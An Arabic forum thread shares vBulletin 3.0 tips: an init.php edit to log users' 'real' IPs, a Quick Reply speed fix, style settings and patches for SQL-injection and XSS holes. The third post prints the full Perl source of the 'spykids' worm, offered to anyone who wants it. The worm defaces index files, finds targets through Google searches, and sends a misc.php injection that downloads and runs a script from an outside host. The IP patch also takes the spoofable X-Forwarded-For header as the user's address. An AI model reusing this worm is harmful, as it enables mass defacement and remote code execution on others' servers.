مشاهدة النتائج 1 الى 18 من 18
  1. #1

    موسوع تطوير موقعك ومنتداك "هاكات-استايلات -واشياء كثيره اخرى

    طريقة تحديد الآي بي للمستخدم..][ مهم جدا][..

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    عند تركيبك لمنتديات vbulletin واستخدامها ستجد ان الأيبي الذي يظهر في المشاركات لبعض الأعضاء غير صحيح والسبب هو أن تحديد منتديات الـ vbulletin يعتمد في الأساس على أيبي الجهه وليس الأيبي الحقيقي للعضو .

    مثال على ذلك الأعضاء الموجودين بالسعوديه إذا قام بالدخول على منتدى معين سيجد المشرف بأن الأيبي للعضو الأتي من السعوديه هو أيبي برو**ي مدينة الملك عبدالعزيز وليس الأيبي الصحيح للعضو !! وعلى ذلك سيجد المشرف بأن أعضاء كثر من السعوديه دخلوا لمنتداه بنفس الأيبي وهو برو**ي مدينة الملك عبدالعزيز لأن عنوان البرو**ي مشترك بين المتصفحين القادمين من السعوديه .

    إذن هذه مشكله موجوده في منتديات الـ vbulletin لذلك قمت بالبحث في النسخه ووجدت طريقة تحديد الأيبي موجوده في ملف init.php وقمت بإعادة طريقة البرمجه بحيث يصبح تحديد الأيبي معتمداً على الأيبي الحقيقي وليس أيبي البرو**ي .

    1- إفتح ملف init.php
    2- قم بالبحث عن الأسطر التاليه :
    // ################################################## ###########################
    // establish client IP address
    define('IPADDRESS', $_SERVER['REMOTE_ADDR']);

    // check several settings for the ip; good for not grabbing proxy IPs, but can still be problematic
    if ($_SERVER['HTTP_CLIENT_IP'])
    {
    define('ALT_IP', $_SERVER['HTTP_CLIENT_IP']);
    }
    else if ($_SERVER['HTTP_X_FORWARDED_FOR'] AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3 }#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches))
    {
    // make sure we dont pick up an internal IP defined by RFC1918
    foreach ($matches[0] AS $ip)
    {
    if (!preg_match("#^(10|172\.16|192\.168)\.#", $ip))
    {
    define('ALT_IP', $ip);
    break;
    }
    }
    }
    else if ($_SERVER['HTTP_FROM'])
    {
    define('ALT_IP', $_SERVER['HTTP_FROM']);
    }
    else
    {
    define('ALT_IP', $_SERVER['REMOTE_ADDR']);
    }
    3- قم باستبدالها بالأسطر التاليه :
    // ################################################## ###########################
    // establish client IP address
    // check several settings for the ip; good for not grabbing proxy IPs, but can still be problematic
    if ($_SERVER['HTTP_X_FORWARDED_FOR'] AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3 }#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches))
    {
    // make sure we dont pick up an internal IP defined by RFC1918
    foreach ($matches[0] AS $ip)
    {
    if (!preg_match("#^(127|10|172\.16|192\.168)\.#", $ip))
    {
    define('IPADDRESS', $ip);
    define('ALT_IP', $_SERVER['HTTP_CLIENT_IP']);
    define('ALT_IP2', $_SERVER['REMOTE_ADDR']);
    break;
    }
    }
    }
    else if ($_SERVER['HTTP_CLIENT_IP'])
    {
    define('IPADDRESS', $_SERVER['HTTP_CLIENT_IP']);
    define('ALT_IP', $_SERVER['REMOTE_ADDR']);
    define('ALT_IP2', 'N/A');

    }
    else if($_SERVER['REMOTE_ADDR'])
    {
    define('IPADDRESS', $_SERVER['REMOTE_ADDR']);
    define('ALT_IP', 'N/A');
    define('ALT_IP2', 'N/A');
    }
    else if($_SERVER['HTTP_FROM'])
    {
    define('ALT_IP', $_SERVER['REMOTE_ADDR']);
    define('ALT_IP2', 'N/A');
    define('IPADDRESS', $_SERVER['HTTP_FROM']);
    }else{
    define('IPADDRESS', 'Anonymous');
    define('ALT_IP2', 'Anonymous');
    define('ALT_IP', 'Anonymous');
    }

    if(!defined('IPADDRESS') || !defined('ALT_IP')){
    define('IPADDRESS', 'Anonymous');
    define('ALT_IP', 'Anonymous');
    define('ALT_IP2', 'Anonymous');
    }


    4- قم بالبحث عن الأسطر التاليه
    define('SESSION_IDHASH', md5($_SERVER['HTTP_USER_AGENT'] . ALT_IP )); // this should *never* change during a session
    define('SESSION_HOST', substr(IPADDRESS, 0, 15));
    define('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
    define('REFERRER', $_SERVER['HTTP_REFERER']);


    5- استبدلها بالأسطر التاليه :
    define('SESSION_IDHASH', md5($_SERVER['HTTP_USER_AGENT'] . substr(IPADDRESS, 0, 15) )); // this should *never* change during a session
    define('SESSION_HOST', substr(IPADDRESS, 0, 15));
    define('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
    define('REFERRER', $_SERVER['HTTP_REFERER']);


    6- إحفظ الملف وقم برفعه .

    الان قم بالدخول على المتواجدون الان لو كنت مشرفاً عاماً على منتداك وراقب الأيبي الخاصه بالأعضاء وبالزوار كذلك وستجد أن الأيبي الحقيقي أصبح يظهر بدلاً من أيبي البرو**ي


    الحل الشامل و النهائي لمشكلة بطء المنتدى
    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

    من الاشياء التي تجعل عمل المنتدى بطئ هي :
    التواقيع : فالأفضل تركيب هاك منع تكرار التواقيع ويكتفى بتوقيع واحد في الموضوع
    التواقيع الفلاشية : فيستحسن منع هذه التواقيع
    استخدام الملفات الصوتية مثل الريل : فيستحسن منعها
    -------------------------------

    تمت تجربته على منتديات العربية.. وفعلاً كانت التجربة ناجحة ..


    مع بداية صدور النسخة الثالثة من برنامج المنتديات الشهير vBulletin وبدأت الشكوى من بطء المنتدى، وتمت تجربة جميع الحلول الممكنة، مثل تحديث العدادات وغيرها، ولكن لا آمل!

    أنا لا أنكر أن تحديث العدادات وعمل Optimize and Repair لقاعدة البيانات هي عملية مفيدة جدا وضرورية ولكن المشكلة أنها ليست المشكلة هنا!

    وكان بعض الأخوة يقترح إفراغ الجداول ؟! بالله عليكم كيف نفرغ جداول ونريد أن يعمل المنتدى بصورة صحيحة؟ إفراغ جدول المرفقات سوف يؤدي إلى ضياع مجهود الأعضاء، تفريغ جدول البحث سوف يؤدي على عدم فاعلية البحث في المنتدى! لذلك أنسو كل هذه الحلول لأنها حلول تؤدي إلى مشاكل اكبر (وياليتها بتحل المشكلة الأساسية )

    لقد صادفتني ( الكلام لصاحب الموضوع ) مشكلة بطء المنتدى في منتداي، وبرغم امتلاكي لخط دي أس أل، فانه يلزمني أكثر من دقيقتين لأقوم بفتح احد المواضيع! (لعلك لاحظت إن البطء الأكبر يكون عند مشاهدة المواضيع وليست باقي الصفحات).

    قمت بعمل كل التحديثات ولكن كل شيء لم يجدي، لذلك بحثت ونقبت ووصلت إلى سبب المشكلة الرئيسي...

    هل تعلمون ما هو سبب المشكلة؟

    الرد السريع Quick Reply!!

    ولعلمك، أن مشكلة البطء تظهر فقط لمستخدمي انترنت إ**بلورر! (وجرب بنفسك)

    وذلك بسبب برنامج JavaScript يلزم تحميله ليعمل الرد السريع، ولأن هذا الملف لا يتم تحميله في head فإن المتصفح يقوم بتحميل كل الصفحة بما فيها الصور والمرفقات و JavaScript في الذاكرة أولاً، وبعد ذلك يقوم بعرض الصفحة كاملة مرة واحدة، فتخيل لو أن صفحة بها صور تتعدى ألـ 500 كيلو بايت، فستأخذ دهراً لكي تظهر لمتصفح الـ Dialup!

    وبحثت في منتديات الشركة عن حل، وكل ما وجدته هو نصائح واهنة بتعطيل ميزة الرد السريع للقضاء على المشكلة! وفعلاً سوف تقضي على المشكلة، ولكنك أيضا سوف تقضي على خاصية مهمة جدا جدا!

    ولذلك بدأت في كيفية تخليص الرد السريع من الجافاسكريبت المسببة لكل تلك المشاكل، واستخدامها محدود جدا! ووجدت طريقة ارجع بها الرد السريع إلى صيغة بسيطة جدا وهي كل ما نحتاج إليه لرد سريع!

    بسم الله نبدأ... تابع تنفيذ تلك الخطوات:

    طبعاً جميع التعديلات سيتم من خلال لوحة تحكم المشرف العام ( الخاصة بالمنتدى )

    من خيارات المنتدى
    vBulletin Options
    أختر
    Message Posting and Editing Options
    في صندوق الرد السريع
    Quick Reply Enabled
    اختر هذا الخيار
    Do Not Show Editor Toolbar
    وأختر Yes
    ثم أعمل حفظ Save
    ------------------------------------
    ملاحظة مهمة /// يجب أن نأخذ نسخة من التمبليت قبل التعديل عليها ونحفظها في المذكرة Notepad أو الدفتر WordPad ونحفظها في المستندات أو على سطح المكتب للرجوع إليها لو حدث أي خطأ لا سمح الله ..
    -----------------------------------
    الآن بعد أن عدلنا على صندوق الرد السريع نروح على خيارات الاستايلات & القوالب
    Style Manager
    ونختار الاستايل الذي نستخدمه( وإذا كان لدينا أكثر من إستايل نعمل نفس الخطوات على كل إستايل )
    ثم نختار البحث عن قوالب Edit Templates
    ونبحث عن تمبليت
    Showthread_quickreply
    ونستبدل جميع محتوياته بالملف الموجود بالمرفقات المرفقات.

    ارجع مرة أخرى وأبحث عن تمبليت Postbit_Legacy
    وابحث على هذا الكود وأحذفه :


    كود الـ PHP:
    <img src="$stylevar[imgdir_button]/quickreply.gif" alt="$vbphrase[quick_reply_to_this_message]border="0" />  
    </
    a>  
    </if> 
    يضاً نعمل بحث عن تمبليت Postbit
    وأعمل بحث عن الكود السابق وقم بحذفه .
    أحفظ العمل وروح لمنتداك وشوف النتيجة .
    في النهاية أتمنى أن أكون قد وفقت من المولى سبحانه وتعالى في هذا الشرح وإيجاد حل بطء المنتدى ، ورجائي ممن جرب الطريقة ونفعت معه أن يدعو لي ولوالدي بالرحمة والمغفرة.

    يوجد بالمرفقات ملف للرد السريع العادي showthread_quickreply

    والرد السريع مع الصندوق السحري showthread_quickreply_magictoolbox



    **********************************
    المرفقات

    *********************
    *****************
    *************

    غره جديده مع الحل تفضلووا vBulletin 3.0.3

    السلام عليكم ورحمة الله وبركاته

    تم اكتشاف ثغره جديد في منتديات vb الجيل الثالث

    والثغره موجوده في ملف init.php وتحديداً في سطر 542 وهي ثغرة SQL Injection

    ويتم نجاح هذه الثغره إذا كانت خاصية magic_quotes_gpc معطله OFF داخل الـ PHP .

    التـــرقـــيـــع :

    توجد طريقتين

    الأولى :

    إضافة السطر التالي في ملف .htaccess

    php_value magic_quotes_gpc 1

    الثاني/ بتعديل ملف init.php .

    قم بالبحث عن


    كود PHP:


    كود الـ PHP:
      datastoretemp $DB_site->query(
    SELECT title, data 
    FROM " 
    TABLE_PREFIX "datastore 
    WHERE title IN ('" 
    implode("', '"$specialtemplates) . "') 
    "
    ); 
    unset(
    $specials$specialtemplates); 
    واستبداله بالتالي

    كود الـ PHP:

    if(!is_array($specialtemplates)) 
    exit; 
    $specialtemplate = array(); 
    foreach (
    $specialtemplates AS $arrykey => $arryval

    $specialtemplate[] = addslashes($specialtemplates["$arrykey"]); 

    $datastoretemp $DB_site->query(
    SELECT title, data 
    FROM " 
    TABLE_PREFIX "datastore 
    WHERE title IN ('" 
    implode("', '"$specialtemplate) . "') 
    "
    ); 
    unset(
    $specials$specialtemplates$specialtemplate); 
    6at693fdl0fh

    attachment


  2. ...

  3. #2
    39 ستايل لمنتداك مع الصوره تستطيع تحميلها



    كيف تضيف قائمه المشرفين في واجهة المنتدى
    attachment

    غير بيانات العضو من افقي الى عمودي
    اذهب الى خيارات المنتدى



    ومن ثم اختار إعدادات الاستايلات واللغه الافتراضيه



    ومن ثم اذهب الا Use Legacy (Vertical) Postbit Template

    واختار الخيار ( نعم )

  4. #3
    دوده تعتمد على جوجل لاختراق المنتديات فى بى3
    بسم الله الرحمن الرحيم

    وصلني ياشباب تحذير من دودة تهاجم منتديات vb

    الجيل الثالث بكل إصداراتها ما عدى 3.0.7

    والحل الوحيد لها هو الترقية للإصدار 3.0.7

    أو إستخدام الترقيع اللي نزلته شركة Jelsoft

    بس بصراحه الدودة مي بسيطه

    تستخدم محرك بحث جوجل ومو بس كذا وتسجل اختراقاتها بعد

    هذا هو سورس الدودة للي يبي

    كود الـ PHP:
     #!/usr/bin/perl  

    #####################  
    ####  
    ####  ####    ####    ####    ####    ####   ####   #    #    #    #   ####  
    ####  #    #    #    #    #          #   #     #         #         #    #    #  #     #  
    ####  ####    #    #    ###      ##        ####   #         ####    ##       ###  
    ####  #          #    #    #          # #            #    #         #    #    #  #     #  
    ####  #          ####    ####    #   #    ####    ####   #    #    #   #    ####  
    ####  
    #####################  
    #  
    #  Desenvolvi este worm  
    #  porque briguei com a  
    #  namorada e eu tinha  
    # que descontar a raiva  
    # em alguem, me desculpe  
    # se esse alguém é Você  
    #  
    #####################  



    use IO::Socket::INET;  
    $hahaha = $0;  
    my $processo "/usr/local/sbin/httpd";  
    $SIG{"INT"} = "IGNORE";  
    $SIG{"HUP"} = "IGNORE";  
    $SIG{"TERM"} = "IGNORE";  
    $SIG{"CHLD"} = "IGNORE";  
    $SIG{"PS"} = "IGNORE";  

    $
    0="$processo"."\0"x16;  
    my $pid=fork;  
    exit if 
    $pid;  

    ########################  
    #                                           #  
    #  procura index                  #  
    #                                          #  
    #######################  

    system("locate index.* >> index");  
    system("find / -name index.* >> index");  

    open(a,"<index");  
    @
    ind = <a>;  
    close(a);  
    $b scalar(@ind);  
    for(
    $a=0;$a<=$b;$a++){  
    chomp $ind[$a];  
    system("echo spykids ownz your server > $ind[$a]");  
    }  


    #########################  
    #                                              #  
    # pega sites e registra           #  
    #                                             #  
    #########################  

    `cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`;  


    open(a,"<sites");  
    @
    site = <a>;  
    close(a);  

    $b scalar(@site);  

    for(
    $a=0;$a<=$b;$a++)  
    {  
    $site[$a] =~ s/#//g;  
    $site[$a] =~ s/servername//g;  
    $site[$a] =~ s/ServerName//g;  
    $site[$a] =~ s//g;  
    $testa IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80Proto => "tcp") or next;  
    print 
    $testa "GET / HTTP/1.0\n\n";  
    print 
    $testa "Host: $site";  
    print 
    $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";  
    print 
    $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";  
    print 
    $testa "Accept-Language: pt-br, pt;q=0.50";  
    print 
    $testa "Accept-Encoding: gzip, deflate, compress;q=0.9";  
    print 
    $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";  
    print 
    $testa "Keep-Alive: 300";  
    print 
    $testa "Connection: keep-alive";  
    @
    ow = <$testa>;  
    close($teste);  
    $ae "@ow";  
    if(
    $ae =~/spykids/i){  
    $sock IO::Socket::INET->new(PeerAddr => "www.zone-h.org"PeerPort => 80Proto => "tcp") or die "nao conectou";  
    print 
    $sock "POST /en/defacements/notify HTTP/1.0\r\n";  
    print 
    $sock "Accept: */*\r\n";  
    print 
    $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";  
    print 
    $sock "Accept-Language: pt-br\r\n";  
    print 
    $sock "Content-Type: application/x-www-form-urlencoded\r\n";  
    print 
    $sock "Connection: Keep-Alive\r\n";  
    print 
    $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";  
    print 
    $sock "Host: www.zone-h.org\r\n";  
    print 
    $sock "Content-Length: 385\r\n";  
    print 
    $sock "Pragma: no-cache\r\n";  
    print 
    $sock "\r\n";  
    print 
    $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n";  

    close($sock);  
    }  
    }  


    #########################  
    #                                              #  
    #  worm aws.spykids              #  
    #                                             #  
    ########################  
    while(1){  
    $cmd '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}';  




    @
    site "";  
    $a=0;  
    @
    dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck",".cl",".cm",".cn",".co",".cr",".cs",".cu",".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz",".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm",".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl",".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk",".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq",".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km",".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls",".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm",".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my",".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om",".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py",".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl",".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm",".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn",".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw");  
    foreach 
    $dom (@dom){  
    $site "www.google.com";  
    open(a,">pra.txt");  
    print 
    "";  
    close(a);  
    ############### google  

    for($n=0;$n<1000;$n += 100){  
    $sock IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;  
    print 
    $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom      &num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";  
    print 
    $sock "Host: www.google.com";  
    print 
    $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";  
    print 
    $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";  
    print 
    $sock "Accept-Language: pt-br, pt;q=0.50";  
    print 
    $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";  
    print 
    $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";  
    print 
    $sock "Keep-Alive: 300";  
    print 
    $sock "Connection: keep-alive";  
    @
    resu = <$sock>;  
    close($sock);  
    $ae "@resu";  
    while (
    $ae=~ m/<a href=.*?>.*?<\/a>/){  
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;  
    $uber=$1;  
    if ($uber !~/translate/)  
       {  
        if ($uber !~ /cache/)  
    {  
    if ($uber !~ /"/)  
    {  
    if ($uber !~ /google/)  
    {  
    if ($uber !~ /216/)  
    {  
    if ($uber =~/http/)  
    {  

      substr($uber,0,7) = "";  
      $nu = rindex $uber, '/';  
      $uber = substr($uber,0,$nu);  
        

      open(a,">>pra.txt");  
      print a "$uber\n";  
      close(a);  

    }}}}}}  
    }  
    }  
    $ark = "pra.txt";  
    @si = "";  
    open (arquivo,"<$ark");  
    @si = <arquivo>;  
    close(arquivo);  
    $novo ="";  
    foreach (@si){  
    if (!$si{$_})  
    {  
    $novo .= $_;  
    $si{$_} = 1;  
    }  
    }  
    open (arquivo,">$ark");  
    print arquivo $novo;  
    close(arquivo);  
    open(a,"<pra.txt");  
    @site = <a>;  
    close(a);  

    foreach $site (@site){  
    chomp $site;  

    ($site, $dir) = split('/',$site);  


    $soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next;  
    print $soc "GET /$dir$cmd HTTP/1.0\n\n";  
    print $soc "Host: $site";  
    print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";  
    print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";  
    print $soc "Accept-Language: pt-br, pt;q=0.50";  
    print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9";  
    print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";  
    print $soc "Keep-Alive: 300";  
    print $soc "Connection: keep-alive";  
    close($soc);  

    }  

    الحل هو الترقيه او استخدام الترقيع
    وللان لايوجد نسخه ل3.0.7 نظيفه منزوعه الكود لكن الترقيع موجود هنا
    [شرح]تعديل ملف الاستايل ليتوافق مع نسخة المنتدى
    سلامي للجميع
    الكثير يشوف استايل عجبه بس ما يتوافق مع نسخته
    وطريقه تعديله سهله
    افتح ملف الاستايل
    joroh_502
    بواسطه برنامج الفرونت بيج او المفكرة
    وعدل المشار عليه الى رقم نسختك
    joroh_503
    احفظ الملف وارفعه

  5. #4
    [ حلول ] جميع ثغرات الـ vBulletin Version 3.0.3
    السلام عليكم ورحمة الله وبركاته

    بالنسبه للتطوير لنسخة 3,0,3 فهي أمنه وهذا ملخص لما فيها من ثغرات وطرق ترقيعها :
    ==========================================
    1- ثغرة ملف التعليمات faq.php :
    وهي ثغره من نوع Path Disclosure حيث بواسطتها يقدر أن يعرف الشخص المخترق في
    أي دليل داخل السرفر تقع ملفات المنتدى ومستواها ( ضعيف ) .


    الترقيع للثغره :

    * افتح ملف faq.php وقم بالبحث عن الأسطر التاليه:


    كود الـ PHP:
    // initialize some template bits  
    $faqbits '';  
    $faqlinks ''
    أضف بعده الكود التالي
    كود الـ PHP:
     $navbits[''] =$vbphrase['faq']; 
    إحفظ الملف.

    ==========================================

    2-ثغرة ملف editpost.php :
    وهي ثغره من نوع CrossSite Scripting وهي ثغره عن طريقها يتم سرقة الكوكيز
    المحفوظ داخل الأجهزه وبها يستطيع المخترق الدخول للمنتدى بالكوكيز المسروقه
    ولكن لا يستطيع التعديل في بيانات الشخص المسروق الكوكيز منه سواءاً بريده
    الالكتروني أو كلمة المرور وهذه ميزة النسخه من الجيل الثالث . مستواها ( جيد )

    الترقيع:

    * قم بفتح ملف editpost.php وابحث عن السطر التالي:

    كود الـ PHP:
     $edit['title'] = trim($_POST['title']); 
    إستبدله بهذا السطر
    كود الـ PHP:
     $edit['title'] = trim(xss_clean($_POST['title'])); 
    * احفظ الملف .


    ==========================================

    3- ثغرة ملف authorize.php:
    وهي ثغره من نوع SQL Injection.

    وهو ملف خاص بتطبيق عمليات الشراء والتحقق من بعض مواقع الصرافات مثل paypal
    وهو ليس لازم لعمل المنتدى فلو تم حذفه يكون أفضل وهنا بعض التفاصيل عن الثغره:
    ==========================================

    4- إذا كانت لوحة تحكم المشرف العام مفتوحه
    للدخول بدون طلب كلمة مرور أخرى فيفضل أن تقوم بحمايتها تفادياً لأي طريقة وصول
    عن طريق htaccess .
    ويستحسن تغير اسم مجلد لوحة التحكم إلى أي إسم أخر على سبيل المثال myguard
    بعدها قم بفتح ملف config.php وابحث عن كلمة admincp
    وضع بدلاً منها اسمك الجديد .


    ==========================================

    5- لوحة تحكم المراقبين بها ثغرات كثيره أيضاً ويفضل إغلاقها نهائياً عن طريق htaccess ويكتفى عمل المراقبين داخل الساحات فقط .

    شرح طريقة تحديد استايل معين رئيسي للمنتدى
    شرح طريقة تحديد استايل معين رئيسي للمنتدى
    من لوحة التحكم



    ثم يجب أن يكون الإستايل متاح للجميع أي مسموح عرضه
    نقوم بوضع علامة صح بالقرب من اسمه
    ثم نحفظ



    ثم ننتقل إلى خيارات المنتدى



    دبل كلك على الخيار التالي:



    ثم نقوم بإختيار الإستايل المطلوب ونحفظ التعديل

  6. #5
    تسلم الايادي

    بس

    صدقني موضوعك قديم قديم قديم قديم الان كل المنتديات 3.5

    3.6

    مافي 3.0

    قليل جدا من يستخدمون هذي النسخة مع ذالك

    مشكوره

  7. #6
    وشئ اخر

    مكان موضوعك غلط××××

    مكانه الصحيح تطوير المواقع وشكرا

  8. #7
    يووووو
    لي ل التحطيم هذا كان رسلتلها رساله على الخاص ولا تفشلها
    ججججججججججججججج
    مشكووره اختي
    يكفي تعبك معنا
    انتظر توقيع من احد خخخخخخ biggrin

  9. #8

  10. #9
    افا انا مافشلتها

    انا ابيها تجتهد عشان تعطينا لي نسخة3.6

    او3.5

    عشان نستفيد

    مادام عندها هذي الطاقة

    بس ولله معك حق اكارا المفروض اني ارسلت لها اسف ولله

    ارجو انك ماتزعلين مني ^^

  11. #10
    افا انا مافشلتها

    انا ابيها تجتهد عشان تعطينا لي نسخة3.6

    او3.5

    عشان نستفيد

    مادام عندها هذي الطاقة

    بس ولله معك حق اكارا المفروض اني ارسلت لها اسف ولله

    ارجو انك ماتزعلين مني ^^
    هلا ياخي وينكم مليت ماشوف احدحتى حليب اختفى من الوجوود وانت وشوي بعد انا خلاص المدارس قربت وينكم
    قبل ما تبدى ابي اشوفكم واكلمكم ونلعب شوي مايصير كل واحد منا يدخل ولا يشوف الثاني
    والله اشتقت لكم مره

  12. #11

  13. #12
    إقتباس الرسالة الأصلية كتبت بواسطة Akara
    هلا ياخي وينكم مليت ماشوف احدحتى حليب اختفى من الوجوود وانت وشوي بعد انا خلاص المدارس قربت وينكم
    قبل ما تبدى ابي اشوفكم واكلمكم ونلعب شوي مايصير كل واحد منا يدخل ولا يشوف الثاني
    والله اشتقت لكم مره
    افا حليب يمكن عنده ظروف او ان احد شربه

    امزح

    انا ولله قللت من دخولي للالعاب والمسبقات

    المدارس ماقربت المدارس وصلت cry cry cry

    ولكن انشاء الله تعدي على خير

    وانشاء الله نلعب مع بعض سلامز smoker

  14. #13
    شكــراً علــى الموضــُوع ..
    ..
    لكن مثــل ماقالو الأخــوان ..
    ..
    ..
    ..
    بـاايــُووو ..

  15. #14
    مشكووووووووووووووووووورة اختي على تعبك
    انتظروني راح ارجع في احد الايام

    [img]http://www3.*********/2006/10/01/02/75984471.gif[/img]

  16. #15
    ياسلام عليج والله يعجبني موضوعج والمعلومات اللي فيه والله روعة اتمنى نشوف مواضيع على الساحات مثل هالمواضيع
    Kenshin000000010314162214846

  17. #16

    افا حليب يمكن عنده ظروف او ان احد شربه

    امزح

    انا ولله قللت من دخولي للالعاب والمسبقات

    المدارس ماقربت المدارس وصلت cry cry cry

    ولكن انشاء الله تعدي على خير

    وانشاء الله نلعب مع بعض سلامز smoker
    جججج
    من جد يمكن احد شربه
    اي من جد المدارس خلاص بدت
    يلا اشوفكم على خير ان وهو
    سلام

  18. #17
    إقتباس الرسالة الأصلية كتبت بواسطة $ squall $ مشاهدة المشاركة
    تسلم الايادي

    بس

    صدقني موضوعك قديم قديم قديم قديم الان كل المنتديات 3.5

    3.6

    مافي 3.0

    قليل جدا من يستخدمون هذي النسخة مع ذالك

    مشكوره
    يا اخي لو انه قديم عندك احنا لأ نعرفه مفهوم ولو انه قديم لأ تقلها لها بل شجعها يا اخي وشكرا
    e5a4d859ec0dae91d53e9cb950baecea

  19. #18

بيانات عن الموضوع

الأعضاء الذين يشاهدون هذا الموضوع

عدد زوار الموضوع الآن 1 . (0 عضو و 1 ضيف)

المفضلات

collapse_40b قوانين المشاركة

  • غير مصرّح لك بنشر موضوع جديد
  • غير مصرّح بالرد على المواضيع
  • غير مصرّح لك بإرفاق ملفات
  • غير مصرّح لك بتعديل مشاركاتك
  •  

مكسات على ايفون  مكسات على اندرويد  Rss  Facebook  Twitter